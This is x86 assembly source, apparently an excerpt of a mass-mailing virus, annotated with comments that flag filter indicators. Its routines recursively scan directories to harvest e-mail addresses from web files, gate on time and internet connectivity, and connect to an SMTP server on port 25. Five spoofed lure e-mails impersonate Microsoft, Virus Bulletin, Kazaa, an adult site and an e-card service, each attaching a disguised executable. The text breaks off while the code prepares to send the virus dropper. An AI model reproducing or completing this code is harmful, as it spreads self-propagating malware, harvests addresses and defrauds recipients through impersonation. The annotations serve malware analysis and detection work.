;globals for the address harvester (every label is reached as [ebp + label])
NumberOfEmails dw 0 ;word counter of addresses appended to MailsMemory
TempDir db 0ffh dup(0) ;255-byte zero-filled path buffer; not referenced in this excerpt
;-----------------------------------------------------------------------
; FindFiles - recursive directory walk
; Enumerates the current directory with FindFirstFile/FindNextFile and
; [ebp + search_mask]; descends into every subdirectory whose name does
; not start with "." by changing the process current directory (and
; changing back to ".." afterwards), and hands every non-directory entry
; to ScanFileForMails.
; In:    current directory = directory to walk; ebp = base for all labels
; Out:   none
; Clobb: eax, flags; [ebp + hfind] is one shared global, preserved across
;        the recursive call only by the push/pop around it
; Note:  the walk is visible as a run of SetCurrentDirectory calls on the
;        process rather than as path strings being built.
;-----------------------------------------------------------------------
FindFiles:
;recursive scan of directories for files
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + search_mask]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitFind ;no match: hfind is not updated, ExitFind closes whatever it holds
mov dword ptr [ebp + hfind],eax ;save search handle
@find: mov eax,[ebp + dwFileAttributes]
and eax,FILE_ATTRIBUTE_DIRECTORY
cmp eax,FILE_ATTRIBUTE_DIRECTORY ;is directory ?
jne Is_File
cmp byte ptr [ebp + cFileName],"." ;skip every name starting with "." (covers "." and "..")
je FindNext
push dword ptr [ebp + hfind] ;save search handle across the recursion
lea eax,[ebp + cFileName]
push eax
call [ebp + SetCurrentDirectory]
cmp eax,1h ;descends only when the BOOL return is exactly 1
je _SD
pop eax ;chdir failed: drop the saved handle copy
jmp FindNext
_SD: call FindFiles ;recurse; the inner call overwrites hfind
pop dword ptr [ebp + hfind] ;restore this level's search handle
lea eax,[ebp + dotdot]
push eax
call [ebp + SetCurrentDirectory] ;back to the parent directory
jmp FindNext
Is_File:
lea eax,[ebp + cFileName] ;eax = file name for the scanner
call ScanFileForMails ;preserves all registers (pushad/popad inside)
FindNext:
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @find ;move to next entry
ExitFind:
push dword ptr [ebp + hfind]
call [ebp + FindClose] ;close the search handle
ret ;exit search
dotdot db "..",0 ;parent-directory name used on the way back up
FILE_ATTRIBUTE_DIRECTORY equ 00000010h ;winnt.h value
;-----------------------------------------------------------------------
; ScanFileForMails - harvest "mailto:" addresses from a web/xml file
; Opens the file read-only, maps it (PAGE_READONLY / FILE_MAP_READ) and
; scans the view for the 7-byte token "mailto:"; the address following
; each token is appended to the NUL-separated list at [ebp + MailsMemory]
; and counted in NumberOfEmails. Only names ending in the lowercase
; extensions .htm/.asp/.xml and sized 512 bytes .. 80 KiB are scanned.
; A one-frame SEH handler (MailSearchErr, below) covers the whole routine:
; the scan loop advances eax inside the loop without shortening the ecx
; iteration counter, so the cursor can run past the end of the view; the
; handler swallows that fault, releases mapping and handles and returns
; to the caller.
; In:    eax = NUL-terminated file name (relative to current directory)
; Out:   none; all registers preserved (pushad/popad)
; Clobb: flags
; Side effects: [ebp + hfile], hmap, mapbase, _FSize, LastMailPointer,
;        NewMail, NumberOfEmails and the MailsMemory list; there is no
;        bound check on MailsMemory in this routine.
;-----------------------------------------------------------------------
ScanFileForMails:
pushad
lea ecx,[ebp + MailSearchErr]
push ecx ;SEH frame: handler address ...
xor ecx,ecx
push dword ptr fs:[ecx] ;... previous fs:[0] ...
mov fs:[ecx],esp ;... installed; ecx is left 0 for the length loop
@gSize: cmp byte ptr [eax + ecx],0h ;ecx = strlen(file name)
je ChkExt
inc ecx
jmp @gSize
ChkExt: sub ecx,4h ;point at the last 4 bytes (the extension)
cmp dword ptr [eax + ecx],"mth." ;".htm" as a little-endian dword; lowercase only
je _1
cmp dword ptr [eax + ecx],"psa." ;".asp"
je _1
cmp dword ptr [eax + ecx],"lmx." ;".xml" - any other name is skipped
jne ExitMS
_1: push 0h ;hTemplateFile
push FILE_ATTRIBUTE_NORMAL ;dwFlagsAndAttributes
push OPEN_EXISTING ;dwCreationDisposition
push 0h ;lpSecurityAttributes
push FILE_SHARE_READ ;dwShareMode
push GENERIC_READ ;dwDesiredAccess: read-only open
push eax ;file name
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitMS
mov [ebp + hfile],eax
xor eax,eax
push eax ;lpName = NULL
push eax ;dwMaximumSizeLow = 0 -> whole file
push eax ;dwMaximumSizeHigh = 0
push PAGE_READONLY
push eax ;lpAttributes = NULL
push [ebp + hfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je _CloseF
mov [ebp + hmap],eax
push 0h ;lpFileSizeHigh = NULL
push [ebp + hfile]
call [ebp + GetFileSize]
cmp eax,0ffffffffh ;INVALID_FILE_SIZE
je _CloseM
cmp eax,14000h
ja _CloseM ;dont scan files which are > 80k
cmp eax,200h
jb _CloseM ;dont scan files which are < 512 bytes
mov [ebp + _FSize],eax
xor eax,eax
push eax ;dwNumberOfBytesToMap = 0 -> entire mapping
push eax ;dwFileOffsetLow
push eax ;dwFileOffsetHigh
push FILE_MAP_READ
push [ebp + hmap]
call [ebp + MapViewOfFile] ;map file into memory
cmp eax,0h
je _CloseM
mov [ebp + mapbase],eax ;from here on eax is the cursor into the view
mov ecx,[ebp + _FSize] ;size of file
sub ecx,0ah ;ecx = iteration count for "loop" below (size - 10)
cmp ecx,0h
jbe Unmap
mov edi,[ebp + MailsMemory] ;where to store mails
@lm: cmp byte ptr [edi],0h ;edi = first NUL in the list
je _1_
inc edi
jmp @lm
_1_: mov [ebp + LastMailPointer],0h ;bytes appended in this file; zeroed once per file, not per address
@checkM:cmp dword ptr [eax],"liam" ;"mail" ...
jne NotMail
cmp dword ptr [eax + 3h],":otl" ;... overlapping "lto:" -> "mailto:"
jne NotMail
add eax,7h ;skip the mailto:
cmp byte ptr [ebp + NewMail],0h ;first address ever: write at the edi found by @lm
je checkC
@lm2: cmp byte ptr [edi],0h ;otherwise move edi to the list tail:
jne _2_ ;the first NUL that follows another NUL
cmp byte ptr [edi-1],0h ;(entries are separated by one NUL,
je checkC ;the list ends with two)
_2_: inc edi
jmp @lm2
checkC: cmp byte ptr [eax],"?" ;terminators: "?" (start of a query part) ...
je _Stop
cmp byte ptr [eax],""" ;... and the closing quote
je _Stop
cmp byte ptr [eax],"@" ;always copied
je @cpyM
cmp byte ptr [eax],"." ;always copied
je @cpyM
cmp byte ptr [eax],7ah ;otherwise only 30h..7ah ("0".."z") is copied
ja BadMail
cmp byte ptr [eax],30h
jnb @cpyM
jmp BadMail ;any byte below "0" (space, "-", "!", ...) rejects the address
@cpyM: mov bl,byte ptr [eax] ;append one byte to the list
mov byte ptr [edi],bl
inc eax
inc edi
inc dword ptr [ebp + LastMailPointer]
jmp checkC
_Stop: inc [ebp + NumberOfEmails] ;address complete (word counter)
inc edi ;the zero already in the buffer stays as terminator
mov byte ptr [ebp + NewMail],1h ;later addresses are appended via @lm2
inc dword ptr [ebp + LastMailPointer]
NotMail:inc eax ;next byte of the view (also reached from BadMail)
loop @checkM ;ecx counts iterations, not the bytes eax has consumed
Unmap: push [ebp + mapbase]
call [ebp + UnMapViewOfFile]
_CloseM:push [ebp + hmap]
call [ebp + CloseHandle]
_CloseF:push [ebp + hfile]
call [ebp + CloseHandle]
ExitMS: pop dword ptr fs:[0] ;unlink the SEH frame
add esp,4h ;drop the handler address
popad
ret ;exit mail search
;-----------------------------------------------------------------------
; MailSearchErr - SEH handler for ScanFileForMails
; Entered by the exception dispatcher with [esp + 8h] = our registration
; record (the esp value at install time). It does not return a
; disposition: it rewinds esp to the frame, unlinks it, restores the
; pushad registers (which makes [ebp + ...] valid again), releases
; whatever mapbase/hmap/hfile currently hold and returns straight to the
; caller of ScanFileForMails. Any fault during the scan ends the scan of
; that file silently.
;-----------------------------------------------------------------------
MailSearchErr:
mov esp,[esp + 8h] ;esp = registration record (prev fs:[0], handler above it)
pop dword ptr fs:[0]
add esp,4h
popad
push [ebp + mapbase] ;cleanup uses the globals as-is, even if the fault
call [ebp + UnMapViewOfFile] ;happened before they were set for this file
push [ebp + hmap]
call [ebp + CloseHandle]
push [ebp + hfile]
call [ebp + CloseHandle]
ret ;returns to the caller of ScanFileForMails, not to the dispatcher
BadMail:
sub edi,[ebp + LastMailPointer] ;rewind the list by the cumulative per-file count (see _1_)
jmp NotMail ;and resume scanning after the rejected byte
_FSize dd 0 ;size of the file being scanned
LastMailPointer dd 0 ;bytes appended to MailsMemory during the current file
NewMail db 0 ;set once the first address is stored; not cleared in this excerpt
;Win32 SYSTEMTIME (8 words), filled by GetLocalTime in CheckConditions;
;only wMinute, wDay and wSecond are read there
SYSTEMTIME:
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
;-----------------------------------------------------------------------
; CheckConditions - time-window and connectivity gate
; Reads the local time and requires wMinute >= 45, wDay <= 25 and
; wSecond >= 30; then loads Wininet.dll, resolves
; InternetCheckConnectionA and forces a connection attempt to
; SiteToCheck (google.com). The narrow time window and the wininet probe
; are both observable behaviours of this routine.
; In:    ebp = base for all labels
; Out:   CF = 1 if every condition holds, CF = 0 otherwise
; Clobb: eax, ebx, edx, flags
; Note:  edx (the HMODULE) is assumed to survive both the
;        __GetProcAddress call and the InternetCheckConnectionA call;
;        stdcall does not guarantee that. The module is freed only on
;        the success path.
;-----------------------------------------------------------------------
CheckConditions:
;check time & internet connection
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime] ;local time, not UTC
cmp word ptr [ebp + wMinute],2dh ;minute must be >= 45
jb BadConditions
cmp word ptr [ebp + wDay],19h ;day of month must be <= 25
ja BadConditions
cmp word ptr [ebp + wSecond],1eh ;second must be >= 30
jb BadConditions
lea eax,[ebp + WinInetDll]
push eax
call [ebp + LoadLibrary]
cmp eax,0h
je BadConditions
xchg edx,eax ;edx = HMODULE of wininet
lea eax,[ebp + _InternetCheckConnection]
push eax ;lpProcName
push edx ;hModule
call [ebp + __GetProcAddress] ;presumably this code's own GetProcAddress wrapper (double underscore) - confirm
cmp eax,0h
je BadConditions ;module stays loaded on this and the next failure path
push 0h ;dwReserved
push FLAG_ICC_FORCE_CONNECTION ;really attempt the connection
lea ebx,[ebp + SiteToCheck]
push ebx ;lpszUrl
call eax ;InternetCheckConnectionA
cmp eax,0h ;there is internet connection ?
je BadConditions
push edx
call [ebp + FreeLibrary]
stc ;success: CF = 1
ret
BadConditions:
clc ;failure: CF = 0
ret
WinInetDll db "Wininet.dll",0
_InternetCheckConnection db "InternetCheckConnectionA",0 ;ANSI export name
FLAG_ICC_FORCE_CONNECTION equ 00000001h ;wininet.h
SiteToCheck db "http://www.google.com/",0 ;connectivity probe target
;-----------------------------------------------------------------------
; Five spoofed From:/Subject: header pairs, one per lure, each followed
; by a Size* equ so the mailer can send it by length. The display names
; impersonate well-known vendors; these literal strings are ready-made
; mail-filter indicators.
; (A stray double quote inside the text of lure 5 looks like an
; extraction artifact of the original quoting - left as found.)
;-----------------------------------------------------------------------
FromAndSubject1:
;from and subject - lure 1: fake vendor security update
db "From:Microsoft Security Alert <SecurityUpdate@Microsoft.com>",0dh,0ah
db "Subject:Microsoft Security Update",0dh,0ah
SizeOfFromAndSubject1 equ ($-FromAndSubject1)
FromAndSubject2:
;from and subject - lure 2: adult pictures
db "From:WorldSex.com <Pictures@WorldSex.com>",0dh,0ah
db "Subject:Your Dayly Pictures",0dh,0ah
SizeOfFromAndSubject2 equ ($-FromAndSubject2)
FromAndSubject3:
;from and subject - lure 3: fake antivirus tool
db "From:Virus Bulletin <Support@Virusbtn.com>",0dh,0ah
db "Subject:A New Tool From Virus Bulletin",0dh,0ah
SizeOfFromAndSubject3 equ ($-FromAndSubject3)
FromAndSubject4:
;from and subject - lure 4: fake file-sharing client
db "From:Kazaa.com <Support@Kazaa.com>",0dh,0ah
db "Subject:Get YourSelf Kazaa Media Desktop !!!",0dh,0ah
SizeOfFromAndSubject4 equ ($-FromAndSubject4)
FromAndSubject5:
;from and subject - lure 5: fake e-card
db "From:Greeting-Card.com <FreeGreeting@Greeting-Cards.com>",0dh,0ah
db "Subject:You"ve got an e-card at greeting-cards.com",0dh,0ah
SizeOfFromAndSubject5 equ ($-FromAndSubject5)
;-----------------------------------------------------------------------
; Fixed MIME preamble shared by every lure. Constant, filter-friendly
; features: the hard-coded multipart boundary "bound1", the forged
; X-Mailer / X-MimeOLE "Outlook Express 6.00.2800.1106" version strings
; and the windows-1255 (Hebrew) charset of the text part.
; (The doubled quotes around bound1 and windows-1255 look like an
; extraction artifact of the original quoting - left as found.)
;-----------------------------------------------------------------------
MessageMimeHeader:
db "MIME-Version: 1.0",0dh,0ah
db "Content-Type: multipart/mixed;",0dh,0ah
db " boundary="bound1"",0dh,0ah
db "X-Priority: 3",0dh,0ah
db "X-MSMail-Priority: Normal",0dh,0ah
db "X-Mailer: Microsoft Outlook Express 6.00.2800.1106",0dh,0ah
db "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106",0dh,0ah
db 0dh,0ah,"This is a multi-part message in MIME format.",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: text/plain;",0dh,0ah
db " charset="windows-1255"",0dh,0ah
db "Content-Transfer-Encoding: 7bit",0dh,0ah,0dh,0ah ;blank line: body text follows
SizeOfMessageMimeHeader equ ($-MessageMimeHeader)
;-----------------------------------------------------------------------
; Lure bodies 1..5. Each is the text of the text/plain part followed by
; the headers of the second MIME part: an application/octet-stream .exe
; attachment, base64-encoded, named identically in Content-Type and
; Content-Disposition. The attachment names (Internet Explorer Update.exe,
; 150_XXX_Pictures.exe, Antivirus Update.exe, Kazaa Media Desktop.exe,
; Your Greeting Card.exe) are the most useful indicators in this block.
; (Doubled quotes around the file names and inside some sentences look
; like an extraction artifact of the original quoting - left as found.)
;-----------------------------------------------------------------------
;message and filename
MessageAndFileName1:
;lure 1: fake browser security update
db "Dear Microsoft Customer",0dh,0ah,0dh,0ah
db "A new vulnerability has been discovered in Internet Explorer",0dh,0ah
db "we recommending you to update internet explorer as soon as",0dh,0ah
db "possible, this vulnerablility is critical and may allow",0dh,0ah
db "execution of malicious code on your system while you use internet",0dh,0ah
db "explorer.",0dh,0ah,0dh,0ah
db "vulnerable versions:",0dh,0ah
db "Internet Explorer 5.0",0dh,0ah
db "Internet Explorer 6.0",0dh,0ah
db "if you using one of this versions please install attached update.",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"The Microsoft Security Team.",0dh,0ah,0dh,0ah
db "If you do not wish to receive future Security Update E-mail from",0dh,0ah
db "Microsoft, or believe you were subscribed in error, please send",0dh,0ah
db "a blank E-mail to SecurityUpdate@microsoft.com",0dh,0ah
db "--bound1",0dh,0ah ;second part: the executable attachment
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Internet Explorer Update.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Internet Explorer Update.exe"",0dh,0ah,0dh,0ah
SizeOfMessageAndFileName1 equ ($-MessageAndFileName1)
MessageAndFileName2:
;lure 2: adult pictures / account renewal
db "150 XXX Pictures For You !!!",0dh,0ah,0dh,0ah
db "here are your dayly xxx pictures.",0dh,0ah
db "Have Fun & Enjoy...",0dh,0ah,0dh,0ah
db "we like to inform you that your account at",0dh,0ah ;try to make this letter formal :)
db "our web site will be expired at the end of",0dh,0ah
db "this month,please renew your account",0dh,0ah
db "renew of account for old members is only 25$",0dh,0ah
db "per half year.",0dh,0ah,0dh,0ah
db "Please Visit Our Web Site:",0dh,0ah
db "http://www.WorldSex.com/",0dh,0ah
db "--bound1",0dh,0ah ;second part: the executable attachment
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "150_XXX_Pictures.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "150_XXX_Pictures.exe"",0dh,0ah,0dh,0ah
SizeOfMessageAndFileName2 equ ($-MessageAndFileName2)
MessageAndFileName3:
;lure 3: fake antivirus tool
db "Dear Symantec/F-Secure/Mcafee/Trend Micro User",0dh,0ah,0dh,0ah
db "We Have Developed A New Tool That Can Block New",0dh,0ah
db "Internet Worms From Attacking Your Computer,We",0dh,0ah
db "Recommending To Install This Tool Before A New",0dh,0ah
db "Internet Worm Will Start To Spread",0dh,0ah,0dh,0ah
db "How To Use The Tool:",0dh,0ah
db "Just Run The Attached File,After You Have Run It",0dh,0ah
db "Follow The Instructions.",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"The Virus Bulletin Security Team.",0dh,0ah
db "For More Information Please Visit Our Web Site:",0dh,0ah
db " http://www.virusbtn.com/",0dh,0ah,0dh,0ah
db "If you do not wish to receive future antivirus tools from",0dh,0ah
db "Virus Bulletin, or believe you were subscribed in error, ",0dh,0ah
db "please send,a blank E-mail to Subscribe@Virusbtn.com",0dh,0ah
db "--bound1",0dh,0ah ;second part: the executable attachment
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Antivirus Update.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Antivirus Update.exe"",0dh,0ah,0dh,0ah
SizeOfMessageAndFileName3 equ ($-MessageAndFileName3)
MessageAndFileName4:
;lure 4: fake file-sharing client
db "Dear User.",0dh,0ah,0dh,0ah
db "Sharman Networks Wants To offer You The New",0dh,0ah
db "Version Of Kazaa !!!",0dh,0ah
db "Please Read Product Description Below:",0dh,0ah,0dh,0ah
db "Kazaa Media Desktop is the world"s No. 1",0dh,0ah
db "free, peer-to-peer, file-sharing software",0dh,0ah
db "application. Features include improved",0dh,0ah
db "privacy protection; the ability to search",0dh,0ah
db "for and download music, playlists, software,",0dh,0ah
db "video files, documents, and images; the",0dh,0ah
db "ability to set up and manage music and video",0dh,0ah
db "playlists; and the ability to perform",0dh,0ah
db "multiple simultaneous searches, including",0dh,0ah
db "up to five Search Mores, which deliver up",0dh,0ah
db "to 1,000 results per search term.",0dh,0ah,0dh,0ah
db "We Have Included A Free Version Of Kazaa In",0dh,0ah
db "This Mail,Try It !!!",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"Sharman Networks.",0dh,0ah,0dh,0ah
db "If you do not wish to receive future E-mail"s from",0dh,0ah
db "Sharman Networks, or believe you were subscribed in",0dh,0ah
db "error, please send a blank E-mail to Remove@kazaa.com",0dh,0ah
db "--bound1",0dh,0ah ;second part: the executable attachment
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Kazaa Media Desktop.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Kazaa Media Desktop.exe"",0dh,0ah,0dh,0ah
SizeOfMessageAndFileName4 equ ($-MessageAndFileName4)
MessageAndFileName5:
;lure 5: fake e-card
db "Greeting-Cards.com have sent you a Greeting Card",0dh,0ah,0dh,0ah
db "One Of Your Friends Wish You Happy Year",0dh,0ah
db "Love,Fun,Good Life,And Good Luck.",0dh,0ah,0dh,0ah
db "To Show His Love He Sent You A Greeting",0dh,0ah
db "Card,Congratulations !",0dh,0ah,0dh,0ah
db "Hope you enjoy our e-cards! Spread the love and send one of our FREE e-cards!",0dh,0ah
db "Brought to you by greeting-cards.com - a better way to greet for FREE! ",0dh,0ah
db "Please Visit Greeting Cards Web site:http://www.greeting-cards.com/",0dh,0ah
db "--bound1",0dh,0ah ;second part: the executable attachment
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Your Greeting Card.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Your Greeting Card.exe"",0dh,0ah,0dh,0ah
SizeOfMessageAndFileName5 equ ($-MessageAndFileName5)
;-----------------------------------------------------------------------
; SMTP protocol fragments. EndOfMail closes the multipart body and sends
; the lone "." line that terminates DATA. The envelope senders (MAIL FROM)
; do not all match the header From: lines above - lures 2, 3 and 5 use a
; different address - a header/envelope mismatch a filter can key on.
; HELO always announces "<localhost>" rather than a host name.
;-----------------------------------------------------------------------
EndOfMail:
db 0dh,0ah,"--bound1--",0dh,0ah ;closing multipart boundary
db 0dh,0ah,".",0dh,0ah ;CRLF "." CRLF ends the DATA phase
SizeOfEndOfMail equ ($-EndOfMail)
HELO db "HELO <localhost>",0dh,0ah ;fixed, non-FQDN greeting
SizeOfHELO equ ($-HELO)
MAILFROM1 db "MAIL FROM:<SecurityUpdate@Microsoft.com>",0dh,0ah ;matches header From: 1
SizeOfMailFrom1 equ ($-MAILFROM1)
MAILFROM2 db "MAIL FROM:<FreePictures@WorldSex.com>",0dh,0ah ;header From: 2 uses Pictures@
SizeOfMailFrom2 equ ($-MAILFROM2)
MAILFROM3 db "MAIL FROM:<VirusAlert@Symantec.com>",0dh,0ah ;header From: 3 uses Virusbtn.com
SizeOfMailFrom3 equ ($-MAILFROM3)
MAILFROM4 db "MAIL FROM:<Support@Kazaa.com>",0dh,0ah ;matches header From: 4
SizeOfMailFrom4 equ ($-MAILFROM4)
MAILFROM5 db "MAIL FROM:<Greets@Greeting-Cards.com>",0dh,0ah ;header From: 5 uses FreeGreeting@
SizeOfMailFrom5 equ ($-MAILFROM5)
QUIT db "QUIT",0dh,0ah
SizeOfQuit equ ($-QUIT)
RCPT db "RCPT TO:<" ;the recipient is presumably sent between RCPT and EndOfRCPT (not visible here)
SizeOfRcpt equ ($-RCPT)
EndOfRCPT db ">",0dh,0ah
SizeOfEndRcpt equ ($-EndOfRCPT)
__DATA db "DATA",0dh,0ah
SizeOfData equ ($-__DATA)
GetBuffer db 0ffh dup(0) ;255-byte buffer, by its name for server replies; use not visible in this excerpt
;-----------------------------------------------------------------------
; Winsock constants and structures used by ConnectToServer.
;-----------------------------------------------------------------------
VERSION1_1 equ 0101h ;wVersionRequested for WSAStartup: winsock 1.1
AF_INET equ 2
SOCK_STREAM equ 1
SOCKET_ERR equ -1 ;INVALID_SOCKET and SOCKET_ERROR are both -1
HOSTENT_IP equ 10h ;offset read from the gethostbyname result; hostent's h_addr_list field is at 0Ch, so 10h presumably reads the first list entry as winsock lays the buffer out - confirm
IPPROTO_TCP equ 6h
vsocket dd 0 ;SOCKET created in ConnectToServer
;WSAData as filled by WSAStartup (WSADESCRIPTION_LEN+1 / WSASYS_STATUS_LEN+1 buffers)
WSADATA:
mVersion dw 0
mHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUpdDg dw 0
lpVendorInfo dd 0
;sockaddr_in (16 bytes); port and address are stored in network byte order
SOCKADDR:
sin_family dw 0
sin_port dw 0
sin_addr dd 0
sin_zero db 8 dup(0)
SizeOfSOCKADDR equ ($-SOCKADDR)
;-----------------------------------------------------------------------
; ConnectToServer - open a TCP connection to the SMTP server
; WSAStartup(1.1) -> socket(AF_INET,SOCK_STREAM,IPPROTO_TCP) ->
; gethostbyname([ebp + SmtpServerAdd]) -> connect() to port 25 using the
; first resolved IPv4 address. Direct outbound TCP/25 from this process
; is the network artifact of this routine.
; In:    ebp = base for all labels; SmtpServerAdd = NUL-terminated host name
; Out:   CF = 1 and [ebp + vsocket] = connected socket on success;
;        CF = 0 on failure (socket closed and/or WSACleanup called as far
;        as the failing step allows; vsocket keeps the stale value)
; Clobb: eax, flags
;-----------------------------------------------------------------------
ConnectToServer:
;connect to smtp server
lea eax,[ebp + WSADATA]
push eax
push VERSION1_1 ;winsock 1.1
call [ebp + WSAStartup] ;start up winsock
cmp eax,0h
jne ConnectionErr
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call [ebp + socket] ;create socket
cmp eax,SOCKET_ERR
je WSACleanErr
mov dword ptr [ebp + vsocket],eax
push 25 ;smtp
call [ebp + htons] ;ax = port in network byte order
mov word ptr [ebp + sin_port],ax
mov word ptr [ebp + sin_family],AF_INET
lea eax,[ebp + SmtpServerAdd]
push eax
call [ebp + gethostbyname] ;blocking DNS lookup of the SMTP host
cmp eax,0h
je CloseSockErr
mov eax,dword ptr [eax + HOSTENT_IP] ;10h is past hostent's h_addr_list field (0Ch); presumably the first list entry as winsock lays it out - confirm
mov eax,dword ptr [eax] ;first IPv4 address, already in network order
mov dword ptr [ebp + sin_addr],eax
push SizeOfSOCKADDR
lea eax,[ebp + SOCKADDR]
push eax
push dword ptr [ebp + vsocket]
call [ebp + connect]
cmp eax,0h
jne CloseSockErr
stc ;connected: CF = 1
ret
CloseSockErr:
push dword ptr [ebp + vsocket]
call [ebp + closesocket]
WSACleanErr:
call [ebp + WSACleanup]
ConnectionErr:
clc ;failed: CF = 0
ret
CreateVirusBase64Image:
cmp byte ptr [ebp + Infection_Success],0h ;if we didnt success to infect file
je SendDropper ;or the running file is not infected
xor ecx,ecx
lea esi,[ebp + FileToInfect]
get_len:cmp byte ptr [esi],0h
je CpyPath
inc ecx
inc esi
jmp get_len
CpyPath:inc ecx
lea esi,[ebp + FileToInfect]
lea edi,[ebp + wvltg_exe_path] ;we simple send the virus dropper